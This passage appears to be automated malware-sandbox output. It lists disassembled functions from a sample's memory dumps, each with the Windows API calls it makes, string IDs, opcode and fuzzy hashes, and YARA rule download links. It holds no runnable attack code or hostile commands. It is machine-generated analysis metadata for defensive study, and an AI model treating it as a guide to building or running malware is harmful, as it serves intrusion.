                                                                                                                • Opcode ID: cb9f92f50b9c3453a44817641df043e54a463723361469b59bd43db308bb254d
                                                                                                                • Instruction ID: 9b0735e4ff43d1a68bb175b8546c96858e2ca590becf480f3925baab07ebd298
                                                                                                                • Opcode Fuzzy Hash: cb9f92f50b9c3453a44817641df043e54a463723361469b59bd43db308bb254d
                                                                                                                • Instruction Fuzzy Hash: FCC14B70A107068FDB24DFA9C884AAEBBF9BF88314F24455DE506DB291DB71E985CF10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000634E, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: invalid string position$string too long
                                                                                                                • API String ID: 0-4289949731
                                                                                                                • Opcode ID: 359c15cd7216263b5d782b770f00760ffc0a58655746efd814c5df38ceff5172
                                                                                                                • Instruction ID: 5a3e2f354fc4a3921b31dc90e1315a262cb4efbd92e0a1aa2f7dfbb08e29a136
                                                                                                                • Opcode Fuzzy Hash: 359c15cd7216263b5d782b770f00760ffc0a58655746efd814c5df38ceff5172
                                                                                                                • Instruction Fuzzy Hash: 4E41F3353043049BEF24CE58DD84A9E77BBEF882C8B24092DF94A87649C771ED54CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0127E026, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 142COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GlobalLock.KERNEL32 ref: 0127E050
                                                                                                                • _strlen.LIBCMT ref: 0127E098
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 0127E0B4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharGlobalLockMultiWide_strlen
                                                                                                                • String ID: System
                                                                                                                • API String ID: 3265272279-3470857405
                                                                                                                • Opcode ID: 59666fa2408d9883a2658d6b05158b4fe206d004234266e9621e1f2a83280e12
                                                                                                                • Instruction ID: 2576f79b0b9a4861f88b7005f4e214edb919aee71b46fe9cb16844bb07cc3f22
                                                                                                                • Opcode Fuzzy Hash: 59666fa2408d9883a2658d6b05158b4fe206d004234266e9621e1f2a83280e12
                                                                                                                • Instruction Fuzzy Hash: C241C47192020A9FDB24DFA8D885ABEBBF4EF44310F158569D415EB284EB709946CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10007D7C, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 120COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID: invalid string position$string too long
                                                                                                                • API String ID: 4104443479-4289949731
                                                                                                                • Opcode ID: c97266721a16bdcbd981853b2f8afc1042802542a366d63a1cba372161f46add
                                                                                                                • Instruction ID: 3a0b6f09acf1d2fbdc82e9b1ab07afe876fd71033d6e88e916f5567ff711aac9
                                                                                                                • Opcode Fuzzy Hash: c97266721a16bdcbd981853b2f8afc1042802542a366d63a1cba372161f46add
                                                                                                                • Instruction Fuzzy Hash: F6410735A01245DBEB34CF18D880D5A77BAFF487C0720496EE95A8B24AD734FD40CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10002E43, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10002E4A
                                                                                                                  • Part of subcall function 1008094B: _malloc.LIBCMT ref: 10080963
                                                                                                                  • Part of subcall function 1008094B: std::exception::exception.LIBCMT ref: 10080981
                                                                                                                  • Part of subcall function 1008094B: __CxxThrowException@8.LIBCMT ref: 10080996
                                                                                                                  • Part of subcall function 10002D99: __EH_prolog3.LIBCMT ref: 10002DA0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3$Exception@8Throw_mallocstd::exception::exception
                                                                                                                • String ID: GroupSize$Separator$Terminator$Uppercase
                                                                                                                • API String ID: 1899336931-2439647881
                                                                                                                • Opcode ID: e7d2982ee122cb414d784776ddce4d7184ccc20506b989e1fc6aa717d153ff53
                                                                                                                • Instruction ID: 1a4b4c1563053d3387978e989619839e8fe46fc9d95030fdfee880afb83d9380
                                                                                                                • Opcode Fuzzy Hash: e7d2982ee122cb414d784776ddce4d7184ccc20506b989e1fc6aa717d153ff53
                                                                                                                • Instruction Fuzzy Hash: 7E31C0B8D04288AEEF04CBE4C916BEE7AA5EF15350F14405DF449AB282DBB86E04C771
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01267C75, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Edit
                                                                                                                • API String ID: 0-554135844
                                                                                                                • Opcode ID: 4302f233648327e8f80e6998b15d53c383ed86ab4b84017d0f42623d616b5857
                                                                                                                • Instruction ID: a99e1f3de11cec34628cd5d10879f2ad2cc7a21ad68d7f624ce9ef0a1abefabb
                                                                                                                • Opcode Fuzzy Hash: 4302f233648327e8f80e6998b15d53c383ed86ab4b84017d0f42623d616b5857
                                                                                                                • Instruction Fuzzy Hash: 52117031370203A7EE321B39BD0AB767AACAF54759F24982AA742E10E4DB62D4D0C750
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012740D6, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45libraryfileloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 012740E8
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateFileTransactedA), ref: 012740F8
                                                                                                                • CreateFileA.KERNEL32(?,?,?,?,?,?,00000000), ref: 01274137
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressCreateFileHandleModuleProc
                                                                                                                • String ID: CreateFileTransactedA$kernel32.dll
                                                                                                                • API String ID: 2580138172-3827029016
                                                                                                                • Opcode ID: eb0ebe3e391c7155d033a0d70b48ceb7d365b097472ab6af01f2f27d3216d2aa
                                                                                                                • Instruction ID: 26f5dd64a5d35b7d8ab7b58c8408a822b7e542d6d71cebceedad6feb051a28a9
                                                                                                                • Opcode Fuzzy Hash: eb0ebe3e391c7155d033a0d70b48ceb7d365b097472ab6af01f2f27d3216d2aa
                                                                                                                • Instruction Fuzzy Hash: 2201DA3221014AFBDF222E99EC09CAB7F6AFF99765B044519BB1551024C772C4A1EB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01271CA9, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 01271CD0
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExA), ref: 01271CE0
                                                                                                                  • Part of subcall function 0126599E: GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 012659B0
                                                                                                                  • Part of subcall function 0126599E: GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 012659C0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: Advapi32.dll$RegDeleteKeyExA
                                                                                                                • API String ID: 1646373207-1984814126
                                                                                                                • Opcode ID: 7837020b7f96f7f15f1d19a2d148351b98f9ac077960fb85c43f8755630d9870
                                                                                                                • Instruction ID: cdb892c2b6cd0146acc5b467d422e135675f7d458cbb7c0d9fc44352af64acba
                                                                                                                • Opcode Fuzzy Hash: 7837020b7f96f7f15f1d19a2d148351b98f9ac077960fb85c43f8755630d9870
                                                                                                                • Instruction Fuzzy Hash: 1A01D635225302FBEF315F98E804FA63FA9AF48795F00001CF64AA1158C7B2E4A0EF51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0127667D, Relevance: 7.7, APIs: 5, Instructions: 157windowthreadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 01276684
                                                                                                                • SendMessageA.USER32(?,00000138,?,?), ref: 01276709
                                                                                                                • GetBkColor.GDI32(?), ref: 01276712
                                                                                                                • GetTextColor.GDI32(?), ref: 0127671E
                                                                                                                • GetThreadLocale.KERNEL32(00000000,0000F1C0,0000F1C0,00000000,00000014), ref: 012767B4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Color$H_prolog3LocaleMessageSendTextThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 187318432-0
                                                                                                                • Opcode ID: ac77fdfb9c7f14f6f30b744b4924eaad62395d78858e7a5c0a740749d96b67af
                                                                                                                • Instruction ID: b63657ab30ced6987a590bf0c3bc6a8374210d3aae607b1a9438c8df519b8100
                                                                                                                • Opcode Fuzzy Hash: ac77fdfb9c7f14f6f30b744b4924eaad62395d78858e7a5c0a740749d96b67af
                                                                                                                • Instruction Fuzzy Hash: 5E51A272520747EFEB15EF64D845ABAB7A4FF18310F14441AE516DB2E0EB70A894CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0127FC0A, Relevance: 7.6, APIs: 5, Instructions: 150timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 0127FC2B
                                                                                                                • __cftof.LIBCMT ref: 0127FC3E
                                                                                                                • GetFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0127FC68
                                                                                                                • GetFileSizeEx.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0127FC80
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: File$SizeTime__cftof_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2749391713-0
                                                                                                                • Opcode ID: 0abf415be9d24b0ccbfdeb6fe1e8300933b918e5afeaf69c32aa642ffb26f37e
                                                                                                                • Instruction ID: 862d4f3a366444cbca4865c80b026b625f5f3266936f0972ab72639407338b7c
                                                                                                                • Opcode Fuzzy Hash: 0abf415be9d24b0ccbfdeb6fe1e8300933b918e5afeaf69c32aa642ffb26f37e
                                                                                                                • Instruction Fuzzy Hash: 03511C719246069FDB24DFA8DA84CABB7F8FF187107108A2DE576D7690E730E944CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01283636, Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _malloc.LIBCMT ref: 01283642
                                                                                                                  • Part of subcall function 01283D04: __FF_MSGBANNER.LIBCMT ref: 01283D1B
                                                                                                                  • Part of subcall function 01283D04: __NMSG_WRITE.LIBCMT ref: 01283D22
                                                                                                                  • Part of subcall function 01283D04: RtlAllocateHeap.NTDLL(014D0000,00000000,00000001,00000000,00000000,00000000,?,01287F86,00000000,00000000,00000000,00000000,?,0128E0EF,00000018,012A7998), ref: 01283D47
                                                                                                                • _free.LIBCMT ref: 01283655
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap_free_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1020059152-0
                                                                                                                • Opcode ID: f7731c7028156e6a550b9597415dffc2daa406ef8f20b8568d44154fe87e2ec5
                                                                                                                • Instruction ID: f799a6054c530033ee21da1b59b7b1b562af0b9ea79d6d3cdac32f00e3e50fe4
                                                                                                                • Opcode Fuzzy Hash: f7731c7028156e6a550b9597415dffc2daa406ef8f20b8568d44154fe87e2ec5
                                                                                                                • Instruction Fuzzy Hash: A2119432527227AFCB22BF7CA8446697A98BF10B78F148529EA059A2D1DA35C4808758
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0127EA08, Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetMapMode.GDI32(?,?,?,?,?,?,0127BAC2,?,00000000,0000001C,0127AB6C), ref: 0127EA18
                                                                                                                • GetDeviceCaps.GDI32(?,00000058), ref: 0127EA52
                                                                                                                • GetDeviceCaps.GDI32(?,0000005A), ref: 0127EA5B
                                                                                                                  • Part of subcall function 01268842: MulDiv.KERNEL32(?,00000000,00000000), ref: 0126887B
                                                                                                                  • Part of subcall function 01268842: MulDiv.KERNEL32(?,00000000,00000000), ref: 0126889C
                                                                                                                • MulDiv.KERNEL32(?,000009EC,00000060), ref: 0127EA7F
                                                                                                                • MulDiv.KERNEL32(00000000,000009EC,?), ref: 0127EA8A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CapsDevice$Mode
                                                                                                                • String ID:
                                                                                                                • API String ID: 696222070-0
                                                                                                                • Opcode ID: 2c0bf276e4539096ebcc59c73d46953b1305efedfcb998791d31c46d9bf3f7ed
                                                                                                                • Instruction ID: ed0fa3aa3a1425e52224a36f45ad2cd13f0961a33b78e526f25857916e5ddb09
                                                                                                                • Opcode Fuzzy Hash: 2c0bf276e4539096ebcc59c73d46953b1305efedfcb998791d31c46d9bf3f7ed
                                                                                                                • Instruction Fuzzy Hash: AA11C276A00216BFDB11AB59DC48C6AFF6AFF88360B054065FA1857350C771AD61CBE0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0127EA98, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetMapMode.GDI32(?,00000000,?,?,?,?,0127BB06,?), ref: 0127EAA8
                                                                                                                • GetDeviceCaps.GDI32(?,00000058), ref: 0127EAE2
                                                                                                                • GetDeviceCaps.GDI32(?,0000005A), ref: 0127EAEB
                                                                                                                  • Part of subcall function 01268A94: MulDiv.KERNEL32(?,00000000,00000000), ref: 01268ACD
                                                                                                                  • Part of subcall function 01268A94: MulDiv.KERNEL32(?,00000000,00000000), ref: 01268AEE
                                                                                                                • MulDiv.KERNEL32(?,00000060,000009EC), ref: 0127EB0E
                                                                                                                • MulDiv.KERNEL32(00000000,?,000009EC), ref: 0127EB1D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CapsDevice$Mode
                                                                                                                • String ID:
                                                                                                                • API String ID: 696222070-0
                                                                                                                • Opcode ID: e0f7aad9649b62f30503bb25ad94397065c3a66846695c11c82515fcd69cb635
                                                                                                                • Instruction ID: 9e324a34e23db4bd44b345ecad5c62480672b32913f344d056e1e7928486cf1a
                                                                                                                • Opcode Fuzzy Hash: e0f7aad9649b62f30503bb25ad94397065c3a66846695c11c82515fcd69cb635
                                                                                                                • Instruction Fuzzy Hash: A711A075A00216BFDB21AB59DC4986EFF69FB88361B014065FA1857390CB71AD61CBE0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126FDF6, Relevance: 7.6, APIs: 5, Instructions: 55stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: TextWindow$_memset_strlenlstrcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 2299656921-0
                                                                                                                • Opcode ID: af450502a8e1b1d6cb1137618d4da3c7008cf073e1ea9f6d920c204c9c94832f
                                                                                                                • Instruction ID: 672b9a8ed0194ecbb518174e2cf198b37339908b0fc13468b0149a80e152635e
                                                                                                                • Opcode Fuzzy Hash: af450502a8e1b1d6cb1137618d4da3c7008cf073e1ea9f6d920c204c9c94832f
                                                                                                                • Instruction Fuzzy Hash: DC01D676A1111967DF30EA6CAD88FFF7B6CEF55B10F1000A9EB04D3181DA709AC087A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01274148, Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 0127414F
                                                                                                                  • Part of subcall function 01262C72: _malloc.LIBCMT ref: 01262C8E
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,00000008), ref: 01274189
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000), ref: 0127418F
                                                                                                                • DuplicateHandle.KERNEL32(00000000), ref: 01274192
                                                                                                                • GetLastError.KERNEL32(?), ref: 012741AC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CurrentProcess$DuplicateErrorH_prolog3HandleLast_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 3353467733-0
                                                                                                                • Opcode ID: e07a79b4c6838bff07bb8c936c312b9fdb4fc1cbbaa5620a24f62c62844b691e
                                                                                                                • Instruction ID: a484f90272f26ec21936f4af3137eee406304a73de70f82a7e7faf3204e4167d
                                                                                                                • Opcode Fuzzy Hash: e07a79b4c6838bff07bb8c936c312b9fdb4fc1cbbaa5620a24f62c62844b691e
                                                                                                                • Instruction Fuzzy Hash: F311AD70B20212AFCF10FFB8DC48A2ABFA8FF14360B148119E614DB294DB30D800CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012702CC, Relevance: 7.5, APIs: 5, Instructions: 33COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • TlsFree.KERNEL32 ref: 012702F1
                                                                                                                • GlobalHandle.KERNEL32(00000000), ref: 01270300
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 01270309
                                                                                                                • GlobalFree.KERNEL32 ref: 01270310
                                                                                                                • DeleteCriticalSection.KERNEL32(?), ref: 0127031A
                                                                                                                  • Part of subcall function 012704E1: EnterCriticalSection.KERNEL32(?,01389E54,01389E70,00000001,?,?,?,?,00000000,01389E54,?,012706DA,00000004,012692B4,01266D6E,012692DD), ref: 01270546
                                                                                                                  • Part of subcall function 012704E1: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,01389E54,?,012706DA,00000004,012692B4,01266D6E,012692DD,01266B4B,01296BCA), ref: 01270556
                                                                                                                  • Part of subcall function 012704E1: LocalFree.KERNEL32(?,?,?,?,?,00000000,01389E54,?,012706DA,00000004,012692B4,01266D6E,012692DD,01266B4B,01296BCA), ref: 0127055F
                                                                                                                  • Part of subcall function 012704E1: TlsSetValue.KERNEL32(?,00000000,?,?,?,?,00000000,01389E54,?,012706DA,00000004,012692B4,01266D6E,012692DD,01266B4B,01296BCA), ref: 01270571
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
